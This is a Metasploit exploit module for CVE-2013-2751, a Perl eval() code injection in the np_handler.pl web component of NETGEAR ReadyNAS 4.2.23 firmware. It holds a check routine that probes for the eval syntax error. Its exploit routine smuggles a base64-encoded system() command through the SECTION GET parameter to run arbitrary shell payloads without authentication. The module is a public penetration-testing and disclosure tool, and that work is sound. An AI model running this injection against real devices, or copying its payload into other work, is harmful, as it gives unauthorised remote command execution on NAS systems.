##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'NETGEAR ReadyNAS Perl Code Evaluation',
      'Description'    => %q{
        This module exploits a Perl code injection on NETGEAR ReadyNAS 4.2.23 and 4.1.11. The
        vulnerability exists on the web fronted, specifically on the np_handler.pl component,
        due to the insecure usage of the eval() perl function. This module has been tested
        successfully on a NETGEAR ReadyNAS 4.2.23 Firmware emulated environment, not on real
        hardware.
      },
      'Author'         =>
        [
          'Craig Young', # Vulnerability discovery
          'hdm',          # diff the patch
          'juan vazquez'  # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2013-2751' ],
          [ 'OSVDB', '98826' ],
          [ 'URL', 'http://www.tripwire.com/state-of-security/vulnerability-management/readynas-flaw-allows-root-access-unauthenticated-http-request/' ],
          [ 'URL', 'http://www.tripwire.com/register/security-advisory-netgear-readynas/' ]
        ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 4096, # Has into account Apache request length and base64 ratio
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet'
            }
        },
      'Targets'        =>
        [
          [ 'NETGEAR ReadyNAS 4.2.23', { }]
        ],
      'DefaultOptions' =>
        {
          'SSL' => true
        },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 12 2013'
      ))

    register_options(
      [
        Opt::RPORT(443)
      ], self.class)

  end

  def send_request_payload(payload)
    res = send_request_cgi({
      'uri' => normalize_uri("/np_handler", ""),
      'vars_get' => {
         'PAGE' =>'Nasstate',
         'OPERATION' => 'get',
         'SECTION' => payload
      }
    })
    return res
  end

  def check
    res = send_request_payload(")")
    if res and res.code == 200 and res.body =~ /syntax error at \(eval/
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    my_payload = "#{rand_text_numeric(1)});use MIME::Base64;system(decode_base64(\"#{Rex::Text.encode_base64(payload.encoded)}\")"
    print_status("#{peer} - Executing payload...")
    send_request_payload(my_payload)
  end

end